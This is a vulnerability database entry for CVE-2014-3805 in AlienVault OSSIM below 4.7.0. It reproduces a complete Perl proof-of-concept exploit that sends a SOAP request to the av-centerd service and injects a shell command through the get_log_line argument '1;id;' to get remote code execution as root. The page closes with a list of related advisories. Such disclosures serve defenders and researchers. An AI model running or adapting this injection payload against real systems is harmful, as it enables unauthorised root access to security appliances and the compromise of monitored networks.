Lucene search
RootSSV:86990HistoryJul 01, 2014 - 12:00 a.m.
AlienVault OSSIM < 4.7.0 - av-centerd 'get_log_line()' Remote Code Execution
2014-07-0100:00:00
Root
www.seebug.org
13
0.605 Medium
EPSS
Percentile
97.8%
No description provided by source.
# Exploit Title: AlienVault OSSIM < 4.7.0 av-centerd 'get_log_line()' Remote Code Execution
# Date: 06/17/2014
# Exploit Author: Alfredo Ramirez
# Vendor Homepage: http://www.alienvault.com/
# Software Link: http://www.alienvault.com/open-threat-exchange/projects
# Version: < 4.7.0
# Tested on: Debian/Virtual Appliance
# CVE : CVE-2014-3805
#!perl -w
use SOAP::Lite;
# SSL is self-signed so we have to ignore verification.
$ENV{PERL_LWP_SSL_VERIFY_HOSTNAME}=0;
# We simply append the 'id' command to the number of log we want to
# read.
@soap_response = SOAP::Lite
-> uri('AV/CC/Util')
-> proxy('https://172.26.22.2:40007/av-centerd')
-> get_log_line('All', '423d7bea-cfbc-f7ea-fe52-272ff7ede3d2' ,'172.26.22.1', 'test', '/var/log/auth.log', '1;id;')
-> result;
for (@{ $soap_response[0] }) {
print "$_\n";
}
# If vulnerable output will be: uid=0(root) gid=0(root) groups=0(root)
Related
exploitpack
exploitpack
zdi
zdi
packetstorm
packetstorm
Alienvault OSSIM av-centerd 4.7.0 get_log_line Command Injection
2017-09-14 00:00:00
zdt
zdt
Alienvault OSSIM av-centerd 4.7.0 - (get_log_line) Command Injection Exploit
2017-09-13 00:00:00
nessus
nessus
AlienVault OSSIM 'av-centerd' Remote Code Execution
2014-06-23 00:00:00
checkpoint_advisories
checkpoint_advisories
exploitdb
exploitdb
prion
prion
Design/Logic Flaw
2014-06-13 14:55:00
Cross site request forgery (csrf)
2014-06-13 14:55:00
Cross site request forgery (csrf)
2014-08-21 14:55:00
cve
cve
cvelist
cvelist
nvd
nvd
openvas
openvas
AlienVault OSSIM Multiple RCE Vulnerabilities
2014-06-20 00:00:00